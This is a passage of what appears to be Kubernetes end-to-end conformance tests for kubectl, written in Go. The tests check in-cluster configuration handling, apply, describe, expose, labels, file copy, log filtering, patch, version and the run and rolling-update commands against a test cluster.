f.Namespace.Name, "list", schema.GroupResource{Resource: "pods"}, true)
framework.ExpectNoError(err)
By("overriding icc with values provided by flags")
kubectlPath := framework.TestContext.KubectlPath
// we need the actual kubectl binary, not the script wrapper
kubectlPathNormalizer := exec.Command("which", kubectlPath)
if strings.HasSuffix(kubectlPath, "kubectl.sh") {
kubectlPathNormalizer = exec.Command(kubectlPath, "path")
}
kubectlPathNormalized, err := kubectlPathNormalizer.Output()
framework.ExpectNoError(err)
kubectlPath = strings.TrimSpace(string(kubectlPathNormalized))
inClusterHost := strings.TrimSpace(framework.RunHostCmdOrDie(ns, simplePodName, "printenv KUBERNETES_SERVICE_HOST"))
inClusterPort := strings.TrimSpace(framework.RunHostCmdOrDie(ns, simplePodName, "printenv KUBERNETES_SERVICE_PORT"))
framework.Logf("copying %s to the %s pod", kubectlPath, simplePodName)
framework.RunKubectlOrDie("cp", kubectlPath, ns+"/"+simplePodName+":/tmp/")
// Build a kubeconfig file that will make use of the injected ca and token,
// but point at the DNS host and the default namespace
tmpDir, err := ioutil.TempDir("", "icc-override")
overrideKubeconfigName := "icc-override.kubeconfig"
framework.ExpectNoError(err)
defer func() { os.Remove(tmpDir) }()
framework.ExpectNoError(ioutil.WriteFile(filepath.Join(tmpDir, overrideKubeconfigName), []byte(`
kind: Config
apiVersion: v1
clusters:
- cluster:
api-version: v1
server: https://kubernetes.default.svc:443
certificate-authority: /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
name: kubeconfig-cluster
contexts:
- context:
cluster: kubeconfig-cluster
namespace: default
user: kubeconfig-user
name: kubeconfig-context
current-context: kubeconfig-context
users:
- name: kubeconfig-user
user:
tokenFile: /var/run/secrets/kubernetes.io/serviceaccount/token
`), os.FileMode(0755)))
framework.Logf("copying override kubeconfig to the %s pod", simplePodName)
framework.RunKubectlOrDie("cp", filepath.Join(tmpDir, overrideKubeconfigName), ns+"/"+simplePodName+":/tmp/")
framework.ExpectNoError(ioutil.WriteFile(filepath.Join(tmpDir, "invalid-configmap-with-namespace.yaml"), []byte(`
kind: ConfigMap
apiVersion: v1
metadata:
name: "configmap with namespace and invalid name"
namespace: configmap-namespace
`), os.FileMode(0755)))
framework.ExpectNoError(ioutil.WriteFile(filepath.Join(tmpDir, "invalid-configmap-without-namespace.yaml"), []byte(`
kind: ConfigMap
apiVersion: v1
metadata:
name: "configmap without namespace and invalid name"
`), os.FileMode(0755)))
framework.Logf("copying configmap manifests to the %s pod", simplePodName)
framework.RunKubectlOrDie("cp", filepath.Join(tmpDir, "invalid-configmap-with-namespace.yaml"), ns+"/"+simplePodName+":/tmp/")
framework.RunKubectlOrDie("cp", filepath.Join(tmpDir, "invalid-configmap-without-namespace.yaml"), ns+"/"+simplePodName+":/tmp/")
By("getting pods with in-cluster configs")
execOutput := framework.RunHostCmdOrDie(ns, simplePodName, "/tmp/kubectl get pods --v=6 2>&1")
Expect(execOutput).To(MatchRegexp("nginx +1/1 +Running"))
Expect(execOutput).To(ContainSubstring("Using in-cluster namespace"))
Expect(execOutput).To(ContainSubstring("Using in-cluster configuration"))
By("creating an object containing a namespace with in-cluster config")
_, err = framework.RunHostCmd(ns, simplePodName, "/tmp/kubectl create -f /tmp/invalid-configmap-with-namespace.yaml --v=6 2>&1")
Expect(err).To(ContainSubstring("Using in-cluster namespace"))
Expect(err).To(ContainSubstring("Using in-cluster configuration"))
Expect(err).To(ContainSubstring(fmt.Sprintf("POST https://%s:%s/api/v1/namespaces/configmap-namespace/configmaps", inClusterHost, inClusterPort)))
By("creating an object not containing a namespace with in-cluster config")
_, err = framework.RunHostCmd(ns, simplePodName, "/tmp/kubectl create -f /tmp/invalid-configmap-without-namespace.yaml --v=6 2>&1")
Expect(err).To(ContainSubstring("Using in-cluster namespace"))
Expect(err).To(ContainSubstring("Using in-cluster configuration"))
Expect(err).To(ContainSubstring(fmt.Sprintf("POST https://%s:%s/api/v1/namespaces/%s/configmaps", inClusterHost, inClusterPort, f.Namespace.Name)))
By("trying to use kubectl with invalid token")
_, err = framework.RunHostCmd(ns, simplePodName, "/tmp/kubectl get pods --token=invalid --v=7 2>&1")
framework.Logf("got err %v", err)
Expect(err).To(HaveOccurred())
Expect(err).To(ContainSubstring("Using in-cluster namespace"))
Expect(err).To(ContainSubstring("Using in-cluster configuration"))
Expect(err).To(ContainSubstring("Authorization: Bearer invalid"))
Expect(err).To(ContainSubstring("Response Status: 401 Unauthorized"))
By("trying to use kubectl with invalid server")
_, err = framework.RunHostCmd(ns, simplePodName, "/tmp/kubectl get pods --server=invalid --v=6 2>&1")
framework.Logf("got err %v", err)
Expect(err).To(HaveOccurred())
Expect(err).To(ContainSubstring("Unable to connect to the server"))
Expect(err).To(ContainSubstring("GET http://invalid/api"))
By("trying to use kubectl with invalid namespace")
execOutput = framework.RunHostCmdOrDie(ns, simplePodName, "/tmp/kubectl get pods --namespace=invalid --v=6 2>&1")
Expect(execOutput).To(ContainSubstring("No resources found"))
Expect(execOutput).ToNot(ContainSubstring("Using in-cluster namespace"))
Expect(execOutput).To(ContainSubstring("Using in-cluster configuration"))
Expect(execOutput).To(MatchRegexp(fmt.Sprintf("GET http[s]?://%s:%s/api/v1/namespaces/invalid/pods", inClusterHost, inClusterPort)))
By("trying to use kubectl with kubeconfig")
execOutput = framework.RunHostCmdOrDie(ns, simplePodName, "/tmp/kubectl get pods --kubeconfig=/tmp/"+overrideKubeconfigName+" --v=6 2>&1")
Expect(execOutput).ToNot(ContainSubstring("Using in-cluster namespace"))
Expect(execOutput).ToNot(ContainSubstring("Using in-cluster configuration"))
Expect(execOutput).To(ContainSubstring("GET https://kubernetes.default.svc:443/api/v1/namespaces/default/pods"))
})
})
framework.KubeDescribe("Kubectl api-versions", func() {
/*
Release : v1.9
Testname: Kubectl, check version v1
Description: Run kubectl to get api versions, output MUST contain returned versions with ‘v1’ listed.
*/
framework.ConformanceIt("should check if v1 is in available api versions ", func() {
By("validating api versions")
output := framework.RunKubectlOrDie("api-versions")
if !strings.Contains(output, "v1") {
framework.Failf("No v1 in kubectl api-versions")
}
})
})
framework.KubeDescribe("Kubectl apply", func() {
It("should apply a new configuration to an existing RC", func() {
controllerJson := substituteImageName(string(readTestFileOrDie(redisControllerFilename)))
nsFlag := fmt.Sprintf("--namespace=%v", ns)
By("creating Redis RC")
framework.RunKubectlOrDieInput(controllerJson, "create", "-f", "-", nsFlag)
By("applying a modified configuration")
stdin := modifyReplicationControllerConfiguration(controllerJson)
framework.NewKubectlCommand("apply", "-f", "-", nsFlag).
WithStdinReader(stdin).
ExecOrDie()
By("checking the result")
forEachReplicationController(c, ns, "app", "redis", validateReplicationControllerConfiguration)
})
It("should reuse port when apply to an existing SVC", func() {
serviceJson := readTestFileOrDie(redisServiceFilename)
nsFlag := fmt.Sprintf("--namespace=%v", ns)
By("creating Redis SVC")
framework.RunKubectlOrDieInput(string(serviceJson[:]), "create", "-f", "-", nsFlag)
By("getting the original port")
originalNodePort := framework.RunKubectlOrDie("get", "service", "redis-master", nsFlag, "-o", "jsonpath={.spec.ports[0].port}")
By("applying the same configuration")
framework.RunKubectlOrDieInput(string(serviceJson[:]), "apply", "-f", "-", nsFlag)
By("getting the port after applying configuration")
currentNodePort := framework.RunKubectlOrDie("get", "service", "redis-master", nsFlag, "-o", "jsonpath={.spec.ports[0].port}")
By("checking the result")
if originalNodePort != currentNodePort {
framework.Failf("port should keep the same")
}
})
It("apply set/view last-applied", func() {
deployment1Yaml := substituteImageName(string(readTestFileOrDie(nginxDeployment1Filename)))
deployment2Yaml := substituteImageName(string(readTestFileOrDie(nginxDeployment2Filename)))
deployment3Yaml := substituteImageName(string(readTestFileOrDie(nginxDeployment3Filename)))
nsFlag := fmt.Sprintf("--namespace=%v", ns)
By("deployment replicas number is 2")
framework.RunKubectlOrDieInput(deployment1Yaml, "apply", "-f", "-", nsFlag)
By("check the last-applied matches expectations annotations")
output := framework.RunKubectlOrDieInput(deployment1Yaml, "apply", "view-last-applied", "-f", "-", nsFlag, "-o", "json")
requiredString := "\"replicas\": 2"
if !strings.Contains(output, requiredString) {
framework.Failf("Missing %s in kubectl view-last-applied", requiredString)
}
By("apply file doesn't have replicas")
framework.RunKubectlOrDieInput(deployment2Yaml, "apply", "set-last-applied", "-f", "-", nsFlag)
By("check last-applied has been updated, annotations doesn't have replicas")
output = framework.RunKubectlOrDieInput(deployment1Yaml, "apply", "view-last-applied", "-f", "-", nsFlag, "-o", "json")
requiredString = "\"replicas\": 2"
if strings.Contains(output, requiredString) {
framework.Failf("Presenting %s in kubectl view-last-applied", requiredString)
}
By("scale set replicas to 3")
nginxDeploy := "nginx-deployment"
debugDiscovery()
framework.RunKubectlOrDie("scale", "deployment", nginxDeploy, "--replicas=3", nsFlag)
By("apply file doesn't have replicas but image changed")
framework.RunKubectlOrDieInput(deployment3Yaml, "apply", "-f", "-", nsFlag)
By("verify replicas still is 3 and image has been updated")
output = framework.RunKubectlOrDieInput(deployment3Yaml, "get", "-f", "-", nsFlag, "-o", "json")
requiredItems := []string{"\"replicas\": 3", imageutils.GetE2EImage(imageutils.Nginx)}
for _, item := range requiredItems {
if !strings.Contains(output, item) {
framework.Failf("Missing %s in kubectl apply", item)
}
}
})
})
framework.KubeDescribe("Kubectl cluster-info", func() {
/*
Release : v1.9
Testname: Kubectl, cluster info
Description: Call kubectl to get cluster-info, output MUST contain cluster-info returned and Kubernetes Master SHOULD be running.
*/
framework.ConformanceIt("should check if Kubernetes master services is included in cluster-info ", func() {
By("validating cluster-info")
output := framework.RunKubectlOrDie("cluster-info")
// Can't check exact strings due to terminal control commands (colors)
requiredItems := []string{"Kubernetes master", "is running at"}
for _, item := range requiredItems {
if !strings.Contains(output, item) {
framework.Failf("Missing %s in kubectl cluster-info", item)
}
}
})
})
framework.KubeDescribe("Kubectl cluster-info dump", func() {
It("should check if cluster-info dump succeeds", func() {
By("running cluster-info dump")
framework.RunKubectlOrDie("cluster-info", "dump")
})
})
framework.KubeDescribe("Kubectl describe", func() {
/*
Release : v1.9
Testname: Kubectl, describe pod or rc
Description: Deploy a redis controller and a redis service. Kubectl describe pods SHOULD return the name, namespace, labels, state and other information as expected. Kubectl describe on rc, service, node and namespace SHOULD also return proper information.
*/
framework.ConformanceIt("should check if kubectl describe prints relevant information for rc and pods ", func() {
kv, err := framework.KubectlVersion()
Expect(err).NotTo(HaveOccurred())
framework.SkipUnlessServerVersionGTE(kv, c.Discovery())
controllerJson := substituteImageName(string(readTestFileOrDie(redisControllerFilename)))
serviceJson := readTestFileOrDie(redisServiceFilename)
nsFlag := fmt.Sprintf("--namespace=%v", ns)
framework.RunKubectlOrDieInput(controllerJson, "create", "-f", "-", nsFlag)
framework.RunKubectlOrDieInput(string(serviceJson[:]), "create", "-f", "-", nsFlag)
By("Waiting for Redis master to start.")
waitForOrFailWithDebug(1)
// Pod
forEachPod(func(pod v1.Pod) {
output := framework.RunKubectlOrDie("describe", "pod", pod.Name, nsFlag)
requiredStrings := [][]string{
{"Name:", "redis-master-"},
{"Namespace:", ns},
{"Node:"},
{"Labels:", "app=redis"},
{"role=master"},
{"Annotations:"},
{"Status:", "Running"},
{"IP:"},
{"Controlled By:", "ReplicationController/redis-master"},
{"Image:", redisImage},
{"State:", "Running"},
{"QoS Class:", "BestEffort"},
}
checkOutput(output, requiredStrings)
})
// Rc
requiredStrings := [][]string{
{"Name:", "redis-master"},
{"Namespace:", ns},
{"Selector:", "app=redis,role=master"},
{"Labels:", "app=redis"},
{"role=master"},
{"Annotations:"},
{"Replicas:", "1 current", "1 desired"},
{"Pods Status:", "1 Running", "0 Waiting", "0 Succeeded", "0 Failed"},
{"Pod Template:"},
{"Image:", redisImage},
{"Events:"}}
checkKubectlOutputWithRetry(requiredStrings, "describe", "rc", "redis-master", nsFlag)
// Service
output := framework.RunKubectlOrDie("describe", "service", "redis-master", nsFlag)
requiredStrings = [][]string{
{"Name:", "redis-master"},
{"Namespace:", ns},
{"Labels:", "app=redis"},
{"role=master"},
{"Annotations:"},
{"Selector:", "app=redis", "role=master"},
{"Type:", "ClusterIP"},
{"IP:"},
{"Port:", "<unset>", "6379/TCP"},
{"Endpoints:"},
{"Session Affinity:", "None"}}
checkOutput(output, requiredStrings)
// Node
// It should be OK to list unschedulable Nodes here.
nodes, err := c.CoreV1().Nodes().List(metav1.ListOptions{})
Expect(err).NotTo(HaveOccurred())
node := nodes.Items[0]
output = framework.RunKubectlOrDie("describe", "node", node.Name)
requiredStrings = [][]string{
{"Name:", node.Name},
{"Labels:"},
{"Annotations:"},
{"CreationTimestamp:"},
{"Conditions:"},
{"Type", "Status", "LastHeartbeatTime", "LastTransitionTime", "Reason", "Message"},
{"Addresses:"},
{"Capacity:"},
{"Version:"},
{"Kernel Version:"},
{"OS Image:"},
{"Container Runtime Version:"},
{"Kubelet Version:"},
{"Kube-Proxy Version:"},
{"Pods:"}}
checkOutput(output, requiredStrings)
// Namespace
output = framework.RunKubectlOrDie("describe", "namespace", ns)
requiredStrings = [][]string{
{"Name:", ns},
{"Labels:"},
{"Annotations:"},
{"Status:", "Active"}}
checkOutput(output, requiredStrings)
// Quota and limitrange are skipped for now.
})
})
framework.KubeDescribe("Kubectl expose", func() {
/*
Release : v1.9
Testname: Kubectl, create service, replication controller
Description: Create a Pod running redis master listening to port 6379. Using kubectl expose the redis master replication controllers at port 1234. Validate that the replication controller is listening on port 1234 and the target port is set to 6379, port that redis master is listening. Using kubectl expose the redis master as a service at port 2345. The service MUST be listening on port 2345 and the target port is set to 6379, port that redis master is listening.
*/
framework.ConformanceIt("should create services for rc ", func() {
controllerJson := substituteImageName(string(readTestFileOrDie(redisControllerFilename)))
nsFlag := fmt.Sprintf("--namespace=%v", ns)
redisPort := 6379
By("creating Redis RC")
framework.Logf("namespace %v", ns)
framework.RunKubectlOrDieInput(controllerJson, "create", "-f", "-", nsFlag)
// It may take a while for the pods to get registered in some cases, wait to be sure.
By("Waiting for Redis master to start.")
waitForOrFailWithDebug(1)
forEachPod(func(pod v1.Pod) {
framework.Logf("wait on redis-master startup in %v ", ns)
framework.LookForStringInLog(ns, pod.Name, "redis-master", "The server is now ready to accept connections", framework.PodStartTimeout)
})
validateService := func(name string, servicePort int, timeout time.Duration) {
err := wait.Poll(framework.Poll, timeout, func() (bool, error) {
endpoints, err := c.CoreV1().Endpoints(ns).Get(name, metav1.GetOptions{})
if err != nil {
// log the real error
framework.Logf("Get endpoints failed (interval %v): %v", framework.Poll, err)
// if the error is API not found or could not find default credentials or TLS handshake timeout, try again
if apierrs.IsNotFound(err) ||
apierrs.IsUnauthorized(err) ||
apierrs.IsServerTimeout(err) {
err = nil
}
return false, err
}
uidToPort := framework.GetContainerPortsByPodUID(endpoints)
if len(uidToPort) == 0 {
framework.Logf("No endpoint found, retrying")
return false, nil
}
if len(uidToPort) > 1 {
framework.Failf("Too many endpoints found")
}
for _, port := range uidToPort {
if port[0] != redisPort {
framework.Failf("Wrong endpoint port: %d", port[0])
}
}
return true, nil
})
Expect(err).NotTo(HaveOccurred())
service, err := c.CoreV1().Services(ns).Get(name, metav1.GetOptions{})
Expect(err).NotTo(HaveOccurred())
if len(service.Spec.Ports) != 1 {
framework.Failf("1 port is expected")
}
port := service.Spec.Ports[0]
if port.Port != int32(servicePort) {
framework.Failf("Wrong service port: %d", port.Port)
}
if port.TargetPort.IntValue() != redisPort {
framework.Failf("Wrong target port: %d", port.TargetPort.IntValue())
}
}
By("exposing RC")
framework.RunKubectlOrDie("expose", "rc", "redis-master", "--name=rm2", "--port=1234", fmt.Sprintf("--target-port=%d", redisPort), nsFlag)
framework.WaitForService(c, ns, "rm2", true, framework.Poll, framework.ServiceStartTimeout)
validateService("rm2", 1234, framework.ServiceStartTimeout)
By("exposing service")
framework.RunKubectlOrDie("expose", "service", "rm2", "--name=rm3", "--port=2345", fmt.Sprintf("--target-port=%d", redisPort), nsFlag)
framework.WaitForService(c, ns, "rm3", true, framework.Poll, framework.ServiceStartTimeout)
validateService("rm3", 2345, framework.ServiceStartTimeout)
})
})
framework.KubeDescribe("Kubectl label", func() {
var podYaml string
var nsFlag string
BeforeEach(func() {
By("creating the pod")
podYaml = substituteImageName(string(readTestFileOrDie("pause-pod.yaml.in")))
nsFlag = fmt.Sprintf("--namespace=%v", ns)
framework.RunKubectlOrDieInput(podYaml, "create", "-f", "-", nsFlag)
Expect(framework.CheckPodsRunningReady(c, ns, []string{pausePodName}, framework.PodStartTimeout)).To(BeTrue())
})
AfterEach(func() {
cleanupKubectlInputs(podYaml, ns, pausePodSelector)
})
/*
Release : v1.9
Testname: Kubectl, label update
Description: When a Pod is running, update a Label using ‘kubectl label’ command. The label MUST be created in the Pod. A ‘kubectl get pod’ with -l option on the container MUST verify that the label can be read back. Use ‘kubectl label label-’ to remove the label. Kubetctl get pod’ with -l option SHOULD no list the deleted label as the label is removed.
*/
framework.ConformanceIt("should update the label on a resource ", func() {
labelName := "testing-label"
labelValue := "testing-label-value"
By("adding the label " + labelName + " with value " + labelValue + " to a pod")
framework.RunKubectlOrDie("label", "pods", pausePodName, labelName+"="+labelValue, nsFlag)
By("verifying the pod has the label " + labelName + " with the value " + labelValue)
output := framework.RunKubectlOrDie("get", "pod", pausePodName, "-L", labelName, nsFlag)
if !strings.Contains(output, labelValue) {
framework.Failf("Failed updating label " + labelName + " to the pod " + pausePodName)
}
By("removing the label " + labelName + " of a pod")
framework.RunKubectlOrDie("label", "pods", pausePodName, labelName+"-", nsFlag)
By("verifying the pod doesn't have the label " + labelName)
output = framework.RunKubectlOrDie("get", "pod", pausePodName, "-L", labelName, nsFlag)
if strings.Contains(output, labelValue) {
framework.Failf("Failed removing label " + labelName + " of the pod " + pausePodName)
}
})
})
framework.KubeDescribe("Kubectl copy", func() {
var podYaml string
var nsFlag string
BeforeEach(func() {
By("creating the pod")
nsFlag = fmt.Sprintf("--namespace=%v", ns)
podYaml = substituteImageName(string(readTestFileOrDie("busybox-pod.yaml")))
framework.RunKubectlOrDieInput(podYaml, "create", "-f", "-", nsFlag)
Expect(framework.CheckPodsRunningReady(c, ns, []string{busyboxPodName}, framework.PodStartTimeout)).To(BeTrue())
})
AfterEach(func() {
cleanupKubectlInputs(podYaml, ns, busyboxPodSelector)
})
/*
Release : v1.12
Testname: Kubectl, copy
Description: When a Pod is running, copy a known file from it to a temporary local destination.
*/
It("should copy a file from a running Pod", func() {
remoteContents := "foobar\n"
podSource := fmt.Sprintf("%s:/root/foo/bar/foo.bar", busyboxPodName)
tempDestination, err := ioutil.TempFile(os.TempDir(), "copy-foobar")
if err != nil {
framework.Failf("Failed creating temporary destination file: %v", err)
}
By("specifying a remote filepath " + podSource + " on the pod")
framework.RunKubectlOrDie("cp", podSource, tempDestination.Name(), nsFlag)
By("verifying that the contents of the remote file " + podSource + " have been copied to a local file " + tempDestination.Name())
localData, err := ioutil.ReadAll(tempDestination)
if err != nil {
framework.Failf("Failed reading temporary local file: %v", err)
}
if string(localData) != remoteContents {
framework.Failf("Failed copying remote file contents. Expected %s but got %s", remoteContents, string(localData))
}
})
})
framework.KubeDescribe("Kubectl logs", func() {
var nsFlag string
var rc string
containerName := "redis-master"
BeforeEach(func() {
By("creating an rc")
rc = substituteImageName(string(readTestFileOrDie(redisControllerFilename)))
nsFlag = fmt.Sprintf("--namespace=%v", ns)
framework.RunKubectlOrDieInput(rc, "create", "-f", "-", nsFlag)
})
AfterEach(func() {
cleanupKubectlInputs(rc, ns, simplePodSelector)
})
/*
Release : v1.9
Testname: Kubectl, logs
Description: When a Pod is running then it MUST generate logs.
Starting a Pod should have a log line indicating the server is running and ready to accept connections. Also log command options MUST work as expected and described below.
‘kubectl log -tail=1’ should generate a output of one line, the last line in the log.
‘kubectl --limit-bytes=1’ should generate a single byte output.
‘kubectl --tail=1 --timestamp should genrate one line with timestamp in RFC3339 format
‘kubectl --since=1s’ should output logs that are only 1 second older from now
‘kubectl --since=24h’ should output logs that are only 1 day older from now
*/
framework.ConformanceIt("should be able to retrieve and filter logs ", func() {
// Split("something\n", "\n") returns ["something", ""], so
// strip trailing newline first
lines := func(out string) []string {
return strings.Split(strings.TrimRight(out, "\n"), "\n")
}
By("Waiting for Redis master to start.")
waitForOrFailWithDebug(1)
forEachPod(func(pod v1.Pod) {
By("checking for a matching strings")
_, err := framework.LookForStringInLog(ns, pod.Name, containerName, "The server is now ready to accept connections", framework.PodStartTimeout)
Expect(err).NotTo(HaveOccurred())
By("limiting log lines")
out := framework.RunKubectlOrDie("log", pod.Name, containerName, nsFlag, "--tail=1")
Expect(len(out)).NotTo(BeZero())
Expect(len(lines(out))).To(Equal(1))
By("limiting log bytes")
out = framework.RunKubectlOrDie("log", pod.Name, containerName, nsFlag, "--limit-bytes=1")
Expect(len(lines(out))).To(Equal(1))
Expect(len(out)).To(Equal(1))
By("exposing timestamps")
out = framework.RunKubectlOrDie("log", pod.Name, containerName, nsFlag, "--tail=1", "--timestamps")
l := lines(out)
Expect(len(l)).To(Equal(1))
words := strings.Split(l[0], " ")
Expect(len(words)).To(BeNumerically(">", 1))
if _, err := time.Parse(time.RFC3339Nano, words[0]); err != nil {
if _, err := time.Parse(time.RFC3339, words[0]); err != nil {
framework.Failf("expected %q to be RFC3339 or RFC3339Nano", words[0])
}
}
By("restricting to a time range")
// Note: we must wait at least two seconds,
// because the granularity is only 1 second and
// it could end up rounding the wrong way.
time.Sleep(2500 * time.Millisecond) // ensure that startup logs on the node are seen as older than 1s
recent_out := framework.RunKubectlOrDie("log", pod.Name, containerName, nsFlag, "--since=1s")
recent := len(strings.Split(recent_out, "\n"))
older_out := framework.RunKubectlOrDie("log", pod.Name, containerName, nsFlag, "--since=24h")
older := len(strings.Split(older_out, "\n"))
Expect(recent).To(BeNumerically("<", older), "expected recent(%v) to be less than older(%v)\nrecent lines:\n%v\nolder lines:\n%v\n", recent, older, recent_out, older_out)
})
})
})
framework.KubeDescribe("Kubectl patch", func() {
/*
Release : v1.9
Testname: Kubectl, patch to annotate
Description: Start running a redis master and a replication controller. When the pod is running, using ‘kubectl patch’ command add annotations. The annotation MUST be added to running pods and SHOULD be able to read added annotations from each of the Pods running under the replication controller.
*/
framework.ConformanceIt("should add annotations for pods in rc ", func() {
controllerJson := substituteImageName(string(readTestFileOrDie(redisControllerFilename)))
nsFlag := fmt.Sprintf("--namespace=%v", ns)
By("creating Redis RC")
framework.RunKubectlOrDieInput(controllerJson, "create", "-f", "-", nsFlag)
By("Waiting for Redis master to start.")
waitForOrFailWithDebug(1)
By("patching all pods")
forEachPod(func(pod v1.Pod) {
framework.RunKubectlOrDie("patch", "pod", pod.Name, nsFlag, "-p", "{\"metadata\":{\"annotations\":{\"x\":\"y\"}}}")
})
By("checking annotations")
forEachPod(func(pod v1.Pod) {
found := false
for key, val := range pod.Annotations {
if key == "x" && val == "y" {
found = true
break
}
}
if !found {
framework.Failf("Added annotation not found")
}
})
})
})
framework.KubeDescribe("Kubectl version", func() {
/*
Release : v1.9
Testname: Kubectl, version
Description: The command ‘kubectl version’ MUST return the major, minor versions, GitCommit, etc of the Client and the Server that the kubectl is configured to connect to.
*/
framework.ConformanceIt("should check is all data is printed ", func() {
version := framework.RunKubectlOrDie("version")
requiredItems := []string{"Client Version:", "Server Version:", "Major:", "Minor:", "GitCommit:"}
for _, item := range requiredItems {
if !strings.Contains(version, item) {
framework.Failf("Required item %s not found in %s", item, version)
}
}
})
})
framework.KubeDescribe("Kubectl run default", func() {
var nsFlag string
var name string
var cleanUp func()
BeforeEach(func() {
nsFlag = fmt.Sprintf("--namespace=%v", ns)
name = "e2e-test-nginx-deployment"
cleanUp = func() { framework.RunKubectlOrDie("delete", "deployment", name, nsFlag) }
})
AfterEach(func() {
cleanUp()
})
/*
Release : v1.9
Testname: Kubectl, run default
Description: Command ‘kubectl run’ MUST create a running pod with possible replicas given a image using the option --image=’nginx’. The running Pod SHOULD have one container and the container SHOULD be running the image specified in the ‘run’ command.
*/
framework.ConformanceIt("should create an rc or deployment from an image ", func() {
By("running the image " + nginxImage)
framework.RunKubectlOrDie("run", name, "--image="+nginxImage, nsFlag)
By("verifying the pod controlled by " + name + " gets created")
label := labels.SelectorFromSet(labels.Set(map[string]string{"run": name}))
podlist, err := framework.WaitForPodsWithLabel(c, ns, label)
if err != nil {
framework.Failf("Failed getting pod controlled by %s: %v", name, err)
}
pods := podlist.Items
if pods == nil || len(pods) != 1 || len(pods[0].Spec.Containers) != 1 || pods[0].Spec.Containers[0].Image != nginxImage {
framework.RunKubectlOrDie("get", "pods", "-L", "run", nsFlag)
framework.Failf("Failed creating 1 pod with expected image %s. Number of pods = %v", nginxImage, len(pods))
}
})
})
framework.KubeDescribe("Kubectl run rc", func() {
var nsFlag string
var rcName string
BeforeEach(func() {
nsFlag = fmt.Sprintf("--namespace=%v", ns)
rcName = "e2e-test-nginx-rc"
})
AfterEach(func() {
framework.RunKubectlOrDie("delete", "rc", rcName, nsFlag)
})
/*
Release : v1.9
Testname: Kubectl, run rc
Description: Command ‘kubectl run’ MUST create a running rc with default one replicas given a image using the option --image=’nginx’. The running replication controller SHOULD have one container and the container SHOULD be running the image specified in the ‘run’ command. Also there MUST be 1 pod controlled by this replica set running 1 container with the image specified. A ‘kubetctl logs’ command MUST return the logs from the container in the replication controller.
*/
framework.ConformanceIt("should create an rc from an image ", func() {
By("running the image " + nginxImage)
framework.RunKubectlOrDie("run", rcName, "--image="+nginxImage, "--generator=run/v1", nsFlag)
By("verifying the rc " + rcName + " was created")
rc, err := c.CoreV1().ReplicationControllers(ns).Get(rcName, metav1.GetOptions{})
if err != nil {
framework.Failf("Failed getting rc %s: %v", rcName, err)
}
containers := rc.Spec.Template.Spec.Containers
if checkContainersImage(containers, nginxImage) {
framework.Failf("Failed creating rc %s for 1 pod with expected image %s", rcName, nginxImage)
}
By("verifying the pod controlled by rc " + rcName + " was created")
label := labels.SelectorFromSet(labels.Set(map[string]string{"run": rcName}))
podlist, err := framework.WaitForPodsWithLabel(c, ns, label)
if err != nil {
framework.Failf("Failed getting pod controlled by rc %s: %v", rcName, err)
}
pods := podlist.Items
if pods == nil || len(pods) != 1 || len(pods[0].Spec.Containers) != 1 || pods[0].Spec.Containers[0].Image != nginxImage {
framework.RunKubectlOrDie("get", "pods", "-L", "run", nsFlag)
framework.Failf("Failed creating 1 pod with expected image %s. Number of pods = %v", nginxImage, len(pods))
}
By("confirm that you can get logs from an rc")
podNames := []string{}
for _, pod := range pods {
podNames = append(podNames, pod.Name)
}
if !framework.CheckPodsRunningReady(c, ns, podNames, framework.PodStartTimeout) {
framework.Failf("Pods for rc %s were not ready", rcName)
}
_, err = framework.RunKubectl("logs", "rc/"+rcName, nsFlag)
// a non-nil error is fine as long as we actually found a pod.
if err != nil && !strings.Contains(err.Error(), " in pod ") {
framework.Failf("Failed getting logs by rc %s: %v", rcName, err)
}
})
})
framework.KubeDescribe("Kubectl rolling-update", func() {
var nsFlag string
var rcName string
var c clientset.Interface
BeforeEach(func() {
c = f.ClientSet
nsFlag = fmt.Sprintf("--namespace=%v", ns)
rcName = "e2e-test-nginx-rc"
})
AfterEach(func() {
framework.RunKubectlOrDie("delete", "rc", rcName, nsFlag)
})
/*
Release : v1.9
Testname: Kubectl, rolling update
Description: Command ‘kubectl rolling-update’ MUST replace the specified replication controller with a new replication controller by updating one pod at a time to use the new Pod spec.
*/
framework.ConformanceIt("should support rolling-update to same image ", func() {
By("running the image " + nginxImage)
framework.RunKubectlOrDie("run", rcName, "--image="+nginxImage, "--generator=run/v1", nsFlag)
By("verifying the rc " + rcName + " was created")
rc, err := c.CoreV1().ReplicationControllers(ns).Get(rcName, metav1.GetOptions{})
if err != nil {
framework.Failf("Failed getting rc %s: %v", rcName, err)
}
containers := rc.Spec.Template.Spec.Containers
if checkContainersImage(containers, nginxImage) {
framework.Failf("Failed creating rc %s for 1 pod with expected image %s", rcName, nginxImage)
}
framework.WaitForRCToStabilize(c, ns, rcName, framework.PodStartTimeout)
By("rolling-update to same image controller")
debugDiscovery()
runKubectlRetryOrDie("rolling-update", rcName, "--update-period=1s", "--image="+nginxImage, "--image-pull-policy="+string(v1.PullIfNotPresent), nsFlag)
framework.ValidateController(c, nginxImage, 1, rcName, "run="+rcName, noOpValidatorFn, ns)
})
})
framework.KubeDescribe("Kubectl run deployment", func() {
var nsFlag string
var dName string
BeforeEach(func() {
nsFlag = fmt.Sprintf("--namespace=%v", ns)
dName = "e2e-test-nginx-deployment"
})
AfterEach(func() {
err := wait.Poll(framework.Poll, 2*time.Minute, func() (bool, error) {
out, err := framework.RunKubectl("delete", "deployment", dName, nsFlag)
if err != nil {
if strings.Contains(err.Error(), "could not find default credentials") {
err = nil
}
return false, fmt.Errorf("kubectl delete failed output: %s, err: %v", out, err)
}
return true, nil
})
Expect(err).NotTo(HaveOccurred())
})
/*
Release : v1.9
Testname: Kubectl, run deployment
Description: Command ‘kubectl run’ MUST create a job, with --generator=deployment, when a image name is specified in the run command. After the run command there SHOULD be a deployment that should exist with one container running the specified image. Also there SHOULD be a Pod that is controlled by this deployment, with a container running the specified image.
*/
framework.ConformanceIt("should create a deployment from an image ", func() {
By("running the image " + nginxImage)
framework.RunKubectlOrDie("run", dName, "--image="+nginxImage, "--generator=deployment/v1beta1", nsFlag)
By("verifying the deployment " + dName + " was created")
d, err := c.ExtensionsV1beta1().Deployments(ns).Get(dName, metav1.GetOptions{})
if err != nil {
framework.Failf("Failed getting deployment %s: %v", dName, err)
}
containers := d.Spec.Template.Spec.Containers
if checkContainersImage(containers, nginxImage) {
framework.Failf("Failed creating deployment %s for 1 pod with expected image %s", dName, nginxImage)
}
By("verifying the pod controlled by deployment " + dName + " was created")
